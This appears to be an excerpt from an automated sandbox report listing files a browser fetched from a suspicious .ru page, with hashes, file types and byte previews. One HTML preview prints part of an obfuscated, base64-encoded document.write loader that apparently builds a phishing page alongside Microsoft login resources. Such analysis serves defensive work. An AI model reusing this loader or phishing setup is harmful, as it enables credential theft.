                                                                                                                                                                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):116345
                                                                                                                                                                                                                Entropy (8bit):7.997378915283506
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                                                                                                                                                                MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                                                                                                                                                                SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                                                                                                                                                                SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                                                                                                                                                                SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (7689), with CRLF line terminators
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):20187
                                                                                                                                                                                                                Entropy (8bit):5.868853104659231
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:Jnuqk75Z8tnlmeeM5bRPm+Fnuqk75Z8tnlmeeM5bRP99lrPlrU:275Z8tn8eeYbRPm+C75Z8tn8eeYbRP9m
                                                                                                                                                                                                                MD5:9A5DB9EC51FA4C7F0EA70C7ABC147FAD
                                                                                                                                                                                                                SHA1:3121B24AE72D0320B9E18BAF82D2F35B040393F5
                                                                                                                                                                                                                SHA-256:E2EAF49488A69091817E042A6B74C1AA170B40361E3D693630324C053250D714
                                                                                                                                                                                                                SHA-512:6E5A06D2E4B96AB8D0A20A62F0B7A98A816C8FADD88E7323FB3757FD2100E3CF787F10AC527713D38E05D2A0A9B6ADB8D68C78F095D02F3F4206863F45C6ECA4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://wxxi.deripaud.ru/n682ZHUO/?utm_source=beamer&utm_medium=standalone&utm_campaign=Stillwell-Hansen-Thermal-Parts&utm_content=textlink
                                                                                                                                                                                                                Preview: I find that the harder I work, the more luck I seem to have. -->....<script>....if(atob("aHR0cHM6Ly93WFhJLmRlcmlwYXVkLnJ1L242ODJaSFVPLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhl
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:PNG image data, 1446 x 246, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):77936
                                                                                                                                                                                                                Entropy (8bit):7.983297222395509
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:onfanDMBs6+y3ZgGmKCbtkFYLvnW/GAeuFctFGjqKAhw9udA4rFKb:onfanDK73GGckaLu/GmFcWb9ud/a
                                                                                                                                                                                                                MD5:88B514D78574D719DB51500E1FC9A446
                                                                                                                                                                                                                SHA1:E98E4373B626CA09A92DFB096723A34F057D3855
                                                                                                                                                                                                                SHA-256:4533EC94B8065C44A540752F4AC347B89A93D1EF310AA24DA534E844FC741EAB
                                                                                                                                                                                                                SHA-512:7F00F463262A696B0DE14633314785C17B388F1E3B86D8F0A540F18F220B6DDCC6BF56D991539651D1391A4A2568498A10D11512AC2D65DF263BA2C4CB99FF32
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:.PNG........IHDR..............3...07IDATx....n.T.....N......#:.9..+..x.f... ..@*.M/.b.&..U.qc.....u...e....*O.....`_............!......C"....`.D.......<......y....;$.....vH............)..J...l.8.t...wD.Y..yrR......;....NJ.....D.........lc.Y..$.......<y.}.{.\.9.d..eye;.'....n....oqY..e..On.Qz.~...m....n_......{.1wN:o.N:.\.N.4}m._X^...V..q..[..e..<...x...2..$.].G'C2%c.....p.-W..p..y8=...R.$.*5.&.,V..~....../.gsg.z..........9..N?<~..w....Ps...n./..m4w.....yq...?.q../..^..Q.c..6S...6..<*Gg.!...p..;..}...4M.....J'I.2.....G.yq|.S^.M..>..n5\...]....YY...X........N.X.....UUy}2.?...d.....2;!...G.$U{.<..M..dU..p8...5.C..P........8..8.........E..t..}2.;I.;I..y....U0.rk.V...>...=\1..=.......2.r.Y..{r.....N..y...j./j.........[*......<V.j..K........eiv....-....qQ...T%.T>...y.oy.6s.6..u..=.f..q{.b.j.Vr.#.....`.?...]..N.;...t.;....z-5........j......../>...`s.$%f...\$......y.....<....e..d......[..+..-......)....`Hy....C......R.................0.<....!......)....`
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):89501
                                                                                                                                                                                                                Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:PNG image data, 5 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                Entropy (8bit):4.035372245524405
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:yionv//thPlgflQgol/hBxl/k4E08up:6v/lhP+yd7Tp
                                                                                                                                                                                                                MD5:201D2812095A4039CEA4F5AF12775DE1
                                                                                                                                                                                                                SHA1:13D7CC808DC52ED0B9F00715EED84B47E0037314
                                                                                                                                                                                                                SHA-256:22DA52E01C4AE64A2AA45D242D8BA4F3137BF3464E8AB141EC9386875053469F
                                                                                                                                                                                                                SHA-512:60B687164BCEF78B4512D153CF7D087943862FB25F4BD63BC2F26703E2881B14FA88FB6A723F3A44635A6EA42C925CA8B7B2FD1E85594B6EBA94BEAF0BF37B78
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:.PNG........IHDR..............E......IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (25506)
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):25537
                                                                                                                                                                                                                Entropy (8bit):5.175776809715291
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ICnffouNtwIXd3bmcRxo3kfZNUF/UF1xtjhUrAXJW2i28tvuJisJv4HROdyoL3H0:IC4uNtwI+AXJ0FoLVi
                                                                                                                                                                                                                MD5:093306BA4E497DC22C25795DC0D7B363
                                                                                                                                                                                                                SHA1:E3A3910A86571B9DF4F926061C5BAC2004DDF42C
                                                                                                                                                                                                                SHA-256:4DB512DA2F1FAC8207E52AB2FDD29AFA7A13F80DA0F3DD823B02D6CBD31695A4
                                                                                                                                                                                                                SHA-512:AF08BD4BFBE2E8202DF34B0334517FEAAC6EBEA761FB69AC21F7EF71A28F4804827D17F987943237E8721663B6FDD8129F2219BE1B926BEEB3D0D5260DAEA88E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/js/perfect-scrollbar.jquery.min.js
                                                                                                                                                                                                                Preview:/* perfect-scrollbar v0.7.1 */.!function t(e,n,r){function o(i,s){if(!n[i]){if(!e[i]){var a="function"==typeof require&&require;if(!s&&a)return a(i,!0);if(l)return l(i,!0);var c=new Error("Cannot find module '"+i+"'");throw c.code="MODULE_NOT_FOUND",c}var u=n[i]={exports:{}};e[i][0].call(u.exports,function(t){var n=e[i][1][t];return o(n?n:t)},u,u.exports,t,e,n,r)}return n[i].exports}for(var l="function"==typeof require&&require,i=0;i<r.length;i++)o(r[i]);return o}({1:[function(t,e,n){"use strict";function r(t){t.fn.perfectScrollbar=function(t){return this.each(function(){if("object"==typeof t||"undefined"==typeof t){var e=t;l.get(this)||o.initialize(this,e)}else{var n=t;"update"===n?o.update(this):"destroy"===n&&o.destroy(this)}})}}var o=t("../main"),l=t("../plugin/instances");if("function"==typeof define&&define.amd)define(["jquery"],r);else{var i=window.jQuery?window.jQuery:window.$;"undefined"!=typeof i&&r(i)}e.exports=r},{"../main":7,"../plugin/instances":18}],2:[function(t,e,n){"u
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):3452
                                                                                                                                                                                                                Entropy (8bit):5.117912766689607
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                                                                                                                MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                                                                                                SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                                                                                                SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                                                                                                SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://login.live.com/Me.htm?v=3
                                                                                                                                                                                                                Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):16378
                                                                                                                                                                                                                Entropy (8bit):7.986541062710992
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:hOBEj/gTOkWow647Z1Y8hyJavTiIQslkHC:hOBKJB11Y8heariIQ8ki
                                                                                                                                                                                                                MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                                                                                                                                                                                                SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                                                                                                                                                                                                SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                                                                                                                                                                                                SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_v20ia-gahguvu2fgvxamhg2.js
                                                                                                                                                                                                                Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):48316
                                                                                                                                                                                                                Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):17030
                                                                                                                                                                                                                Entropy (8bit):5.591121014597221
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:WCQi+iSDq5426z7YnyFPtWcDUaJUi0ie1AhNHRu+GujiYXvj:dMz7YktWEUaJUi0ie14uluHfj
                                                                                                                                                                                                                MD5:A55BA6D3E1DC033F478A8763D0E94B83
                                                                                                                                                                                                                SHA1:8AF2BC3610C41F9925FED47864FC116C9C1D34C3
                                                                                                                                                                                                                SHA-256:E072ED8DE5601F4788077699F662D817A13CA14E5C84D76353AA7AAEB5E997D5
                                                                                                                                                                                                                SHA-512:9A16EFE43A81320AD62FEDF6326B033ADFCE02FAABFDC1E29A4E81F32FDBC7FC52F3C31591818F895BF68B1295AE4CB0176A87A6535152F16C00751DC59DCAAE
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/js/mark.min.js
                                                                                                                                                                                                                Preview:/*!***************************************************.* mark.js v8.11.1.* https://markjs.io/.* Copyright (c) 2014.2018, Julian K.hnel.* Released under the MIT license https://git.io/vwTVl.*****************************************************/.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t(require("jquery")):"function"==typeof define&&define.amd?define(["jquery"],t):e.Mark=t(e.jQuery)}(this,function(e){"use strict";e=e&&e.hasOwnProperty("default")?e.default:e;var t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},n=function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")},r=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}return functi
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):21780
                                                                                                                                                                                                                Entropy (8bit):5.145616432554816
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:Zu2ZRtXv1BZ5aWwuF6MdsAA5FFzXtXIiqKrXL1HVZhc:Zu29NTnwK6MxYFFzXtXIiqKrXL1HVZhc
                                                                                                                                                                                                                MD5:E1F18191509752EBFE62873DFB3E7AB4
                                                                                                                                                                                                                SHA1:361D8EFBF8F6E19AB9B5F64CE8F8A2BD1EEBC532
                                                                                                                                                                                                                SHA-256:2AD49C2B604A806D854F9CDEECE92990F2DABDE7FCB7B7468025318F81A18877
                                                                                                                                                                                                                SHA-512:F37027F30F7A2EA4622F55404ADCB7F77D83DA7D8938D888E9AC4B214F75CE68AF417ED13F038B6F6A0C257FC2EA7781F2079F507CC643FAB4CC236DEBEAAD74
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/styles/public.css?v=f2
                                                                                                                                                                                                                Preview:@charset "UTF-8";./* ------------------------------------------------------------------------------------------..BEAMER APP.URL: http://www.getbeamer.com.Author: Joincube Inc..Author URL: http://www.joincube.com.License: .2018.Revised and revamped by: Mariano Xerez.Twitter: @donxerez..------------------------------------------------------------------------------------------ */...container {..overflow-y: scroll;..overflow-x: hidden;..overflow-scrolling: touch;..-webkit-overflow-scrolling: touch;..height: 100vh;..z-index: 200;..-webkit-transform: translate3d(0,0,0);.. transform: translate3d(0,0,0);.}...news {..overflow: visible;..z-index: 100;..height: auto !important;..padding-bottom: 70px;..padding-top: 220px !important;..min-height: 100vh;.}..@media all and (min-width: 901px) {..body.hasModes[data-mode="requests"]:not(.post) .news {...padding-top: 210px !important;..}.....standalone.post.hasModes .news {padding-top: 100px !important;}.}...@media all and (max-width: 900px) {...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 14148, version 1.0
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):14148
                                                                                                                                                                                                                Entropy (8bit):7.986251326799113
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:y7+5nfSpmYVucHXM9xx/D2Rrn++9910ok:lLlHiRc
                                                                                                                                                                                                                MD5:69B28056044BE6438CE7E5214C66BA82
                                                                                                                                                                                                                SHA1:39EE8D4427A6062F942513B5B219A320068C7AE7
                                                                                                                                                                                                                SHA-256:B8E094AD64704C2E4836153E641E432B22159B03D5B240B6DD303461BE83F542
                                                                                                                                                                                                                SHA-512:4ACC21A8C3DC8C5DDEC601426E49F00A43B7F3672B90C59F7D177FE49565E87DC18B65CD138763A7C36BDEDC1A55EFA76FFE5228286381FEF7286927282338D0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/fonts2/Lato-Normal-700b.woff2
                                                                                                                                                                                                                Preview:wOF2......7D......o...6...........................B.p.`..D...........B..6.$..v. .....E.._%c......g....HVN.%..H....[C..P..~.+.E&R.F.Q(.s56&..6.V.'....r...Y.\-..........]....^.E.;...p[.....q..;..Z.......}...T.a.U.......j..tl].?C0.NB.F-.%1...h66zE...$.B..L0..(......o~..o.&......=fn.........V..H9....X;...L.@.."..Z1.....o@,....W+..&..48..........'......[7Y....h.....'?.7s.`.6m2.Es.K..J(e......"..?...u..a.c.&.h*.....M*....L.wE+Ij.G......k..q.>.=i...AF..0sv.s..t.].M+...../.:.E....Z.w;.M.'... .s...8.x..|...:..y.K.kw....|......@(Qx..y..J..K.'.rp....B.Rh.y.....;.e...S,K..$'.....`.pN.;$&....-.aN..<h.%.n.^|~l......ri........E...J..H...V...[Gbh...$%.$.x,...&........ B2.)...\V.........<S..Fn.y..&.:.2gHO..w.|.riX.&.4y...6......<.B.9Z..vmh.).J..Ez(_..X.....a...3o...L.p.x...8$.^....kZ....j....GK...x.R."..@.9.X.c..g.\.Qx..NLMK...../(,*.)-+...q....Z..(*.)+.....ohl.............?<>=...h,..`.M..l._1.....Y.v....7h.(jD)...0.~.]..|....;.'W.../.:....S..........b...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):310
